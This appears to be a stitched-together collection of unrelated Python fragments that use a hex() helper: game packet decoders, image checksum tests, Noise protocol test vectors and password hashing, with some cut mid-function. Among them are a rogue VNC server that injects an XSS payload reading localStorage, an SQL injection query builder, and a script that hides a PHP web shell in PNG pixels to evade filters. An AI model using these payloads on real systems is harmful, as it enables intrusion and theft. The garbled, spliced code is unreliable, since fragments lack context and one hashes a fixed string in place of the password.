def _send_packet(self, sock, packet, addr):
"""Packet を送信する"""
packet.encode()
buffer = packet.buffer()
sock.sendto(buffer, addr)
logger.packet.debug('{addr}<{buffer}', addr=addr, buffer=hex(buffer))
logger.server.debug('N< {addr} {packet}', addr=addr, packet=packet)
def _recv_packet(self, sock):
"""Packet を受信する"""
buffer, addr = sock.recvfrom(_RECV_BUFFER_SIZE)
packet = protocol.net.packet(buffer)
packet.decode()
logger.packet.debug('{addr}>{buffer}', addr=addr, buffer=hex(buffer))
logger.server.debug('N> {addr} {packet}', addr=addr, packet=packet)
return packet, addr
def _decode_packet(self, packet, buffer, inout, kind):
try:
packet.decode()
assert len(packet.buffer()) == 0
except Exception as e:
print(packet.__class__.__name__, '%r' % e, hex(packet.buffer()))
print(kind, inout, buffer)
raise DecodeException()
def __str__(self):
attrs = (
summary(k, getattr(self, k))
for k in self.__slots__
if not k.startswith('_') and hasattr(self, k))
buf = hex(self._buffer.bytes()) if self._buffer.is_reading() else ''
return '{name}({attrs}) {buf}'.format(
name=self.__class__.__name__, attrs=', '.join(attrs), buf=buf)
def decode(self):
super().decode()
self.unknown1 = self._buffer.next_byte()
self.unknown2 = self._buffer.next_int()
self.recipe_id = hex(self._buffer.next(16))
self.material_items = list(self._buffer.next_item()
for _ in range(self._buffer.next_int()))
self.product_items = list(self._buffer.next_item()
for _ in range(self._buffer.next_int()))
def _analyze_value(self, inout, value):
if isinstance(value, set) or isinstance(value, list):
return self._analyze_list(inout, value)
if isinstance(value, bytes):
return hex(value)
if isinstance(value, EncapPacket):
return self._analyze_encapsulated_packet(inout, value)
if isinstance(value, Item) or isinstance(value, MetaData):
return str(value)
return value
def check_pix(self, pix):
pix = self.query.get("Pixels", pix.id.val)
self.assert_(pix.sha1.val != "")
rps = self.client.sf.createRawPixelsStore()
try:
rps.setPixelsId(pix.id.val, True)
sha1 = hex(rps.calculateMessageDigest())
self.assertEquals(sha1, pix.sha1.val)
finally:
rps.close()
def check_pix(self, pix):
pix = self.query.get("Pixels", pix.id.val)
assert pix.sha1.val != ""
rps = self.client.sf.createRawPixelsStore()
try:
rps.setPixelsId(pix.id.val, True)
sha1 = hex(rps.calculateMessageDigest())
assert sha1 == pix.sha1.val
finally:
rps.close()
def get_sha256_salt_and_hash(password):
from Crypto.Random import get_random_bytes
from binascii import hexlify as hex, unhexlify as unhex
from Crypto.Hash import SHA256
new_salt = hex(get_random_bytes(8)).decode("utf8")
h = SHA256.new()
h.update('soma)password'.encode('utf8'))
new_hash = new_salt + h.hexdigest()
return (new_salt, new_hash)
def _analyze_batch(self, inout, payload):
data = {}
buffer = hex(payload)
packet = protocol_serv.packet(bytes.fromhex(buffer))
if isinstance(packet, StreamRaw):
self._update_meta(data, inout, packet, buffer)
data['payload'] = buffer
return data
self._decode_packet(packet, buffer, inout, 'ServicePacket')
self._update_meta(data, inout, packet, buffer)
for name, value in self._analyze_attrs(inout, packet):
data[name] = self._analyze_value(inout, value)
return data
def _analyze_encapsulated_packet(self, inout, packet):
data = {}
if getattr(packet, 'reliability') != None:
data['_reliability'] = getattr(packet, 'reliability')
if getattr(packet, 'message') != None:
data['_message'] = getattr(packet, 'message')
if getattr(packet, 'order') != None:
data['_order'] = getattr(packet, 'order')
if getattr(packet, 'split') != None:
data['_split'] = getattr(packet, 'split')
buffer = hex(packet.buffer)
self._update_meta(data, inout, packet, buffer)
if packet.split:
packet = self._split_packets[inout].concat(packet)
if packet == None:
return data
buffer = hex(packet.buffer)
packet = protocol.app.packet(bytes.fromhex(buffer))
if not isinstance(packet, StreamRaw):
self._decode_packet(packet, buffer, inout, 'NetworkPacket')
self._update_meta(data, inout, packet, buffer)
for name, value in self._analyze_attrs(inout, packet):
data[name] = self._analyze_value(inout, value)
return data
packet = protocol_serv.packet(bytes.fromhex(buffer))
if isinstance(packet, StreamRaw):
self._update_meta(data, inout, packet, buffer)
data['payload'] = buffer
return data
self._decode_packet(packet, buffer, inout, 'ServicePacket')
self._update_meta(data, inout, packet, buffer)
if not isinstance(packet, Batch):
for name, value in self._analyze_attrs(inout, packet):
data[name] = self._analyze_value(inout, value)
return data
data['packets'] = list(
self._analyze_batch(inout, payload) for payload in packet.payloads)
return data
def _next_recipe(self):
kind = self._buffer.next_int()
if kind == 0:
unknown = self._buffer.next_int()
count = self._buffer.next_int()
material_items = list(self._buffer.next_item()
for _ in range(count))
count = self._buffer.next_int()
product_items = list(self._buffer.next_item()
for _ in range(count))
recipe_id = hex(self._buffer.next(16))
return (kind, unknown, material_items, product_items, recipe_id)
if kind == 1:
unknown = self._buffer.next_int()
rows = self._buffer.next_int()
cols = self._buffer.next_int()
material_items = list(self._buffer.next_item()
for _ in range(rows * cols))
count = self._buffer.next_int()
product_items = list(self._buffer.next_item()
for _ in range(count))
recipe_id = hex(self._buffer.next(16))
return (kind, unknown, rows, cols, material_items, product_items,
recipe_id)
if kind == 2:
unknown1 = self._buffer.next_int()
unknown2 = self._buffer.next_int()
item = self._buffer.next_item()
return (kind, unknown1, unknown2, item)
if kind == 3:
unknown1 = self._buffer.next_int()
unknown2 = hex(self._buffer.next(11))
return (kind, unknown1, unknown2)
if kind == 5:
unknown1 = hex(self._buffer.next(20))
return (kind, unknown1)
def _send_buffer(self, send_func):
while True:
buffer = yield
if buffer[0] == '8':
def triad():
n = self._num_of_data_packet
for _ in range(3):
yield n & 0xFF
n >>= 8
seq_num = hex(bytes(b for b in triad()))
buffer = buffer[0:2] + seq_num + buffer[8:]
self._num_of_data_packet += 1
send_func(buffer)
yield None
msg.errno, msg.strerror))
sys.exit()
s.listen(10)
print('Server started')
while 1:
conn, addr = s.accept()
print('Connected with ' + addr[0] + ':' + str(addr[1]))
print('Sending version info')
comunicate(conn, '524642203030332e3030380a')
print('Handshake')
comunicate(conn, '0101') # no password
print('Starting the vnc dance')
comunicate(conn, '00000000')
print('Sending server-name with XSS injection')
xss = b'<img onerror=alert(JSON.stringify(localStorage)) src=# />'
comunicate(
conn, '040003002018000100ff00ff00ff100800000000000000{:02x}{}'.format(
len(xss),
hex(xss).decode()))
sleep(30)
print('Quitting')
conn.close()
s.close()
def __str__(self):
return '{name}({buf})'.format(
name=self.__class__.__name__,
buf=hex(self._buffer.bytes()))
def decode(self):
super().decode()
self.eid = self._buffer.next_long()
self.unknown = hex(self._buffer.next())
def select_all_columns(table_name):
table_name = '0x' + str(hex(table_name))
payload = "select group_concat(column_name) from information_schema.columns where table_name=%s" % (
table_name)
return payload
g = payload[i + 1]
b = payload[i + 2]
im.putpixel((c, 0), (r, g, b))
i += 3
c += 1
im.save(output_image)
def verify(filename, clear_payload):
"""
# I would like to verify if the PNG is valid and not corrupt but Pillow .verify() is not yet implemented
im = Image.open(filename)
im.verify()
im.close()
"""
content = open(filename, "rb").read()
assert (clear_payload in content)
if __name__ == "__main__":
payload = b"a39f67546f2c24152b116712546f112e29152b2167226b6f5f5310"
filename = "test.png"
filterproof = bypass_filters(payload)
# the following assert assure that filter1 and filter3 perform the correct transformation to the payload
assert (
hex(bytes(filterproof)) ==
b"a39f67f70e931b23be2c8ad080f9e1ae22f6d9435dfbaecc5a01dca39f67a5be5f76745a4ca13f7abf306b882d60657d529dad88a166"
)
save_image(filterproof, filename)
verify(filename, b"<?=$_GET[0]($_POST[1]);?>")
def handle_recv_packet(sock):
return hex(sock.recv(4096))
def password_hash(pw):
val = "".encode('utf-8')
pw = pw.encode('utf-8')
for _ in range(50000):
val = sha256hash(val + pw).digest()
return hex(val).decode('utf-8')
def doit(v):
name = v['name']
aead = globals()[v['cipher']]
init_dh = globals()['Curve'+v['dh']]
resp_dh = globals()['Curve'+v['dh']]
hash = globals()[v['hash']]
pattern = globals()['Noise_'+v['pattern']]
one_way = False
if v['pattern'] in [ 'N', 'X', 'K' ]:
one_way = True
prefix = 'Noise'
if v.get('init_psk', None) is not None:
prefix += 'PSK'
init_ssk = unhex(v.get('init_ssk', ''))
resp_ssk = unhex(v.get('resp_ssk', ''))
if init_ssk != '':
prefix += '_SSK'
assert name == '_'.join([prefix, pattern.name, init_dh.name, aead.name, hash.name])
init_prologue = unhex(v.get('init_prologue'))
resp_prologue = unhex(v.get('resp_prologue'))
init_ephemeral = unhex(v.get('init_ephemeral'))
resp_ephemeral = unhex(v.get('resp_ephemeral'))
init_psk = unhex(v.get('init_psk', None))
resp_psk = unhex(v.get('resp_psk', None))
init_static = unhex(v.get('init_static', None))
resp_static = unhex(v.get('resp_static', None))
if init_static is not None:
dh = init_dh(lambda x: init_static)
init_static = dh.generate_keypair()
if resp_static is not None:
dh = resp_dh(lambda x: resp_static)
dh.priv = resp_static
resp_static = dh.generate_keypair()
init_semiephemeral = unhex(v.get('init_semiephemeral', None))
resp_semiephemeral = unhex(v.get('resp_semiephemeral', None))
init_remote_static = unhex(v.get('init_remote_static', None))
resp_remote_static = unhex(v.get('resp_remote_static', None))
init_remote_semiephemeral = unhex(v.get('init_remote_semiephemeral', None))
resp_remote_semiephemeral = unhex(v.get('resp_remote_semiephemeral', None))
init = NoiseHandshake(aead, hash, init_dh, lambda x: init_ephemeral)
resp = NoiseHandshake(aead, hash, resp_dh, lambda y: resp_ephemeral)
init.Initialize(pattern, True, init_prologue, init_static, init_semiephemeral, init_remote_static, init_remote_semiephemeral, init_psk)
resp.Initialize(pattern, False, resp_prologue, resp_static, resp_semiephemeral, resp_remote_static, resp_remote_semiephemeral, resp_psk)
send, recv = init, resp
messages = v['messages']
while len(messages) > 0:
m = messages.pop(0)
ct = unhex(m['ciphertext'])
print "ct:\t{0}".format(hex(ct))
payload = unhex(m.get('payload', ''))
print "p:\t{0}".format(hex(payload))
iout, ic1, ic2 = send.WriteMessage(payload)
assert ct == iout
print "iout:\t{0}".format(hex(iout))
rout, rc1, rc2 = recv.ReadMessage(iout)
print "rout:\t{0}".format(hex(rout))
send, recv = recv, send
if ic1 is not None and ic2 is not None and rc1 is not None and rc2 is not None:
break
# redo split with SSK
ic1, ic2 = send.ss.Split(init_ssk)
rc1, rc2 = send.ss.Split(resp_ssk)
if resp.initiator and not one_way:
ic2, ic1, rc2, rc1 = rc1, rc2, ic1, ic2
for m in messages:
ct = unhex(m['ciphertext'])
print "ct:\t{0}".format(hex(ct))
payload = unhex(m.get('payload', ''))
print "p:\t{0}".format(hex(payload))
iout = ic1.EncryptWithAd('', payload)
print "iout:\t{0}".format(hex(iout))
rout = rc1.DecryptWithAd('', iout)
assert ct == iout
if not one_way:
ic2, ic1, rc2, rc1 = rc1, rc2, ic1, ic2
def _next(self):
unknown1 = self._buffer.next_int()
unknown2 = hex(self._buffer.next(8))
unknown3 = self._buffer.next_str()
return unknown1, unknown2, unknown3
def _next_player(self):
return dict(public_id=hex(self._buffer.next(16)),
eid=self._buffer.next_long(),
user_name=self._buffer.next_str(),
skin_name=self._buffer.next_str(),
skin=self._buffer.next_bytes())